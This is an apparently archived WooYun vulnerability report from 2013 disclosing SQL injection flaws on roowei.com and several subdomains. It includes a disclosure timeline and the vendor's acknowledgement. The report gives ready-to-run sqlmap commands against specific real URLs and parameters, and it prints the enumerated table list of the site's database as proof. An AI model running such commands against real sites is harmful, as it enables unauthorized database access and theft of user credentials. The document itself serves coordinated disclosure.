当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043419

漏洞标题:入围中国网商家第二次注入24W用户以及密码敏感信息泄露(注入大礼包)

相关厂商:roowei.com

漏洞作者: xlz0iza1

提交时间:2013-11-20 10:54

修复时间:2014-01-04 10:55

公开时间:2014-01-04 10:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-20: 细节已通知厂商并且等待厂商处理中
2013-11-20: 厂商已经确认,细节仅向厂商公开
2013-11-30: 细节向核心白帽子及相关领域专家公开
2013-12-10: 细节向普通白帽子公开
2013-12-20: 细节向实习白帽子公开
2014-01-04: 细节向公众公开

简要描述:

主站+分站多枚SQL注入.求20RANK+礼物。

详细说明:

#1:主站注入枚举

sqlmap.py -u "http://www.roowei.com/gg/comcount.php?action=up
_news&n_id=744538" --dbs


sqlmap.py -u "http://www.roowei.com/gg/comcount.php?action=up_jigou&u_id=190751 --dbs


http://www.roowei.com/gg/comcount.php?action=up_host&c_id=656034


n_id、u_id、c_id没有进行过滤。
#2:分站注入枚举

sqlmap.py -u "http://qingan.roowei.com/Search/?Keyword=&Level
=1&match=SPH_MATCH_ALL&Indexes=video&source=481&shendu=4&ac_parent=482" --dns


sqlmap.py -u "http://www.cn.roowei.com/Public/comcount.php?ac
tion=up_sell&s_id=413431" --dbs


sqlmap.py -u "http://sdlc.roowei.com/Search/?Keyword=&Level=1
&match=SPH_MATCH_ALL&Indexes=news&source=&shendu=4&ac_parent=8100" --dbs


sqlmap.py -u "http://jiawang.roowei.com/Search/?Keyword=&Leve
l=1&match=SPH_MATCH_ALL&Indexes=video&source=481&shendu=4&ac_parent=480" --dbs


下面这出没有检测,网速太卡了,无线网的孩子伤不起啊.
http://yushushi.roowei.com/Search/?Keyword=&Level=1&match=SPH_MATCH_ALL&Indexes=video&source=481&shendu=4&ac_parent=481

漏洞证明:

#1:主站注入测试

Database: roowei
[121 tables]
+---------------------------------+
| sl_admin |
| sl_admin_ads |
| sl_admin_ads_manage |
| sl_admin_ads_page |
| sl_admin_ads_type_manage |
| sl_admin_article |
| sl_admin_articlehits |
| sl_admin_articlemycat |
| sl_admin_articlepage |
| sl_admin_industry_ads |
| sl_admin_industry_webseo |
| sl_admin_web_page |
| sl_adminfailedlogin |
| sl_admingroup |
| sl_admingroupmap |
| sl_adminoperlog |
| sl_adminsection |
| sl_album_user |
| sl_backsession |
| sl_cacheback |
| sl_cachefront |
| sl_cachesearchback |
| sl_cachesearchfront |
| sl_ci_sessions |
| sl_classcontent |
| sl_cn_Advertising |
| sl_cn_Comment |
| sl_cn_Photo |
| sl_cn_ads |
| sl_cn_ads1 |
| sl_cn_ads_industry |
| sl_cn_advertising_industry |
| sl_cn_album |
| sl_cn_article |
| sl_cn_articlecatadgrmap |
| sl_cn_articlecategory |
| sl_cn_articlecatusgrmap |
| sl_cn_articlecomment |
| sl_cn_articlecontribution |
| sl_cn_articlecounter |
| sl_cn_articlehits |
| sl_cn_articlehits1 |
| sl_cn_articleimg |
| sl_cn_articleimg_copy |
| sl_cn_articlemycat |
| sl_cn_articlemycomment |
| sl_cn_articlepage |
| sl_cn_articlepage_copy |
| sl_cn_classinfo |
| sl_cn_classinfoattr |
| sl_cn_classinfocatadgmap |
| sl_cn_classinfocatattrelement |
| sl_cn_classinfocatgeory |
| sl_cn_classinfocatusgmap |
| sl_cn_classinfomember |
| sl_cn_count |
| sl_cn_feedback |
| sl_cn_feedbacktadgmap |
| sl_cn_feedbacktusgmap |
| sl_cn_feedbacktype |
| sl_cn_goods |
| sl_cn_goodscatadgrmap |
| sl_cn_goodscategory |
| sl_cn_goodscatusgrmap |
| sl_cn_goodscomment |
| sl_cn_goodsconsignee |
| sl_cn_goodscounter |
| sl_cn_goodsmycomment |
| sl_cn_goodsorder |
| sl_cn_goodsordergoods |
| sl_cn_indexs |
| sl_cn_indexs_1 |
| sl_cn_indexs_copy1 |
| sl_cn_industrie_manage |
| sl_cn_industrie_nav |
| sl_cn_industry_admin |
| sl_cn_industry_website |
| sl_cn_menu |
| sl_cn_message |
| sl_cn_module |
| sl_cn_module_choose |
| sl_cn_module_choose_custom_text |
| sl_cn_module_manage |
| sl_cn_payment |
| sl_cn_poll |
| sl_cn_polloption |
| sl_cn_site |
| sl_cn_staticcontent |
| sl_cn_territory |
| sl_cn_tradebuyvip |
| sl_cn_tradecertificate |
| sl_cn_tradecompany |
| sl_cn_tradecompanyseo |
| sl_cn_tradecorpindmap |
| sl_cn_tradedomainname |
| sl_cn_tradefavoritejobad |
| sl_cn_tradefavoritejobseeker |
| sl_cn_tradeindadgmap |
| sl_cn_tradeindattrelement |
| sl_cn_tradeindusgmap |
| sl_cn_tradeindustry |
| sl_cn_tradeindustry_data |
| sl_cn_tradeinfo |
| sl_cn_tradeinfoattr |
| sl_cn_tradeinfotype |
| sl_cn_tradejobads |
| sl_cn_tradejobcategory |
| sl_cn_tradejobmap |
| sl_cn_tradejobseeker |
| sl_cn_tradelink |
| sl_cn_trademessage |
| sl_cn_trademyproduct |
| sl_cn_trademyproductcat |
| sl_cn_tradeprocontri |
| sl_cn_tradeproduct |
| sl_cn_tradeproduct_content |
| sl_cn_tradeproductattr |
| sl_cn_tradeproducthist |
| sl_cn_user_ads |
| sl_cn_user_hits |
| sl_cn_user_manageads |
+---------------------------------+


#多个截图证明主站分站.

QQ图片20131119231424.jpg


QQ图片20131119231432.jpg


QQ图片20131119232057.jpg


QQ图片20131119232456.jpg


QQ图片20131119233903.jpg


QQ图片20131119234920.jpg

修复方案:

表示无力吐槽,2M的网,假设无线7个人用,o(︶︿︶)o 唉,熄灯的寝室你伤不起.

版权声明:转载请注明来源 xlz0iza1@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-11-20 15:18

厂商回复:

Thx.搜索注入的问题昨天在有位童鞋的反馈下已经处理了.主站的问题已转相应部门处理,非常感谢@xlz0iza1 对入围网安全的关注,谢谢.

最新状态:

暂无